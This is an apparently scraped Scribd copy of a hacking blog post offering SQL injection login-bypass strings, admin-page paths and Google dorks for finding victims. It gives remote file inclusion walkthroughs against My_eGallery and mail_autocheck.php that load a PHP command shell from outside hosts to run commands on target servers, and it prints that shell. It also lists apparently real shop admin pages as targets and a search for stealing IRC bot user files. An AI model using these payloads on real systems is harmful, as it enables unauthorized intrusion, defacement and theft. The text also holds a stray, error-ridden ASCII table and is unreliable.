Google Hack Code: SQL Injection For Admin

This document contains information about hacking tools and techniques, including SQL injection exploits and instructions for hacking admin pages. It discusses bypassing Windows authenticity checks, downloading paid content for free, and exploiting vulnerabilities in specific scripts like My_eGallery to execute remote commands. The document provides example attack strings and URLs to test for vulnerabilities. It aims to help readers hack sites and access admin panels without authorization.

Uploaded by

Krishna Yedula

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

278 views5 pages

Google Hack Code: SQL Injection For Admin

Uploaded by

Krishna Yedula

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 5

Google Hack Code

Menu Home About Us Contact Us Categories recent posts Download Tool Hacking Toolbox SQL Injection for admin Bypass the Windows Genuinity checker Google stuff Download From a Paypal Site Without Paying a Penny

SQL Injection for admin

"/admin.asp" "/login.asp" "/logon.asp" "/adminlogin.asp" "/adminlogon.asp" "/admin_login.asp" "/admin_logon.asp" "/admin/admin.asp" "/admin/login.asp" "/admin/logon.asp" "/admin/adminlogin.asp" "/admin/adminlogon.asp" "/admin/admin_login.asp" "/admin/admin_logon.asp" "/administrator/admin.asp" "/administrator/login.asp" "/administrator/logon.asp" root/login.asp admin/index.asp login With : Community ID:or= Password:or= Bugs File : admin page --> /admin Display : http://target.com/s-cart/admin

1. search in all search engine e.g --> allinurl:s-cart/index.phtml or "s-cart" 2. Get the target site like --> http://www.target.com/s-cart/index.phtml

3. and now go to admin page with change the Url to : http://www.target.com/s-cart/admin --> auto open browser with login and passwd !!! login : admin passwd : or=

4. If U are lucky, u can see the admin manager, show the table Order now or Deface s-cart page. Ok lets to try :P~ secure php how to secure php 1. open php.ini (find your selt were is the place) 2. find part safe_mode (default valiu is off), turn to =on 3. log off the danger fungsion like passthru, system. exec. with fungsion name to the disable_function= 4. teh easy way n more secure --> use normal html ,not php :) 5. wacth out permission direktori and file, note this fungsion is better be off: 1. passthru, system, exec, myshellexec <-- php command shell 2. fopen <-- can executed remote file 3. fwrite, fputs <-- to write file 4. phpinfo <-- data with php Hacking konsep : http://[VICTIM]/mail_autocheck.php?pm_path=http://www.webloe.com/phpinjection.txt?&cmd=id web target you can find in the search engine like google. sample we can use keyword inurl atau allinurl: allinurl:/mail_autocheck.php?pm_path=*.* sample script php injection you can upload to your website ------------------END HERE--------------------------############################################## My_eGallery security exploit Author : scariot shall live for ever ############################################## Bugs File may be : displayCategory.php Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php

Note : for attacking u must use this script, save and upload to your website. e.g save with namefile : cmd.txt e.g from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt ---------------- script from here ----------------------------------------------------SCARIOT - WAS HERE !!! TEST YOUR SERVER !!!

# saleho PHP : # Released by : LALIEUR INC

// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?>

scariot shall live for ever

------------------ End of Script --------------------------------------------------------################################### Ok and now lets Search your Target ################################### 1. search in all search engine e.g --> "allinurl:displayCategory.php" or "My_eGallery" 2. Get the target site like --> http://www.target.com/modules/My_eGallery/public/displayCategory.php 3. test to attack with code : ?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id; 4. Display attacking : http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

5. Linux and Unix command Used in here :P~ e.g : ls -al , uname -r , cat , echo , etc.... steal password/user eggdrop IRC bot clik here for google searchklik [link]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user[/link] injek aja pake ini boz kekekeke User Name : "=" Password : "=" aneh digishop, ko mau yah sql injection kali udah basi juga http://www.returnsforsale.com/secure/admin/ups.php https://tunedinwebsales.com/secure/babicz/admin/ https://www.bswatch.com/secure/admin/index.php http://www.securityzonepr.com/digiSHOP/secure/admin/index.php https://www.tangerineclothing.com/admin/index.php https://www.facesbyfelicia.com/store/admin/index.php Google Inject Again Keyword: allinurl: uptime3?pin= Dec Hex Code Dec Hex Code Dec Hex Code Dec Hex Code 0 00 NUL 32 20 space 64 40 @ 96 60 ` 1 01 SOH 33 21 ! 65 41 A 97 61 a 2 02 STX 34 22 " 66 42 B 98 62 b 3 03 ETX 35 23 # 67 43 C 99 63 c 4 04 EOT 36 24 & 68 44 D 100 64 d 5 05 ENQ 37 25 % 69 45 E 101 65 e 6 06 ACK 38 26 $ 70 46 F 102 66 f 7 07 BEL 39 27 71 47 G 103 67 g 8 08 BS 40 28 ( 72 48 H 104 68 h 9 09 HT 41 29 ) 73 49 I 105 69 i 10 0A LF 42 2A * 74 4A J 106 6A j 11 0B VT 43 2B + 75 4B K 107 6B k 12 0C FF 44 2C , 76 4C L 108 6C l 13 0D CR 45 2D - 77 4D M 109 6D m 14 0E SO 46 2E . 78 4E N 110 6E n 15 0F SI 47 2F / 79 4F O 111 6F o 16 10 DLE 48 30 0 80 50 P 112 70 p 17 11 DC1 49 31 1 81 51 Q 113 71 q 18 12 DC2 50 32 2 82 52 R 114 72 r 19 13 DC3 51 33 3 83 53 S 115 73 s 20 14 DC4 52 34 4 84 54 T 116 74 t 21 15 NAK 53 35 5 85 55 U 117 75 u 22 16 SYN 54 36 6 86 56 V 118 76 v 23 17 ETB 55 37 7 87 57 W 119 77 w 24 18 CAN 56 38 8 88 58 X 140 78 x 25 19 EM 57 39 9 89 59 Y 121 79 y 26 1A SUB 58 3A : 90 5A Z 122 7A z 27 1B ESC 59 3B ; 91 5B [ 123 7B { 28 1C FS 60 3C < 92 5C 124 7C | 29 1D GS 61 3D = 93 5D ] 125 7D } 30 1E RS 62 3E > 94 5E ^ 126 7E ~ 31 1F US 63 3F ? 95 5F _ 127 7F DEL

Google Hack Code: SQL Injection For Admin

Uploaded by

Google Hack Code: SQL Injection For Admin

Uploaded by

Google Hack Code

SQL Injection for admin

# saleho PHP : # Released by : LALIEUR INC

scariot shall live for ever

This entry was posted on 1:12 AM

0 Responses to SQL Injection for admin

You might also like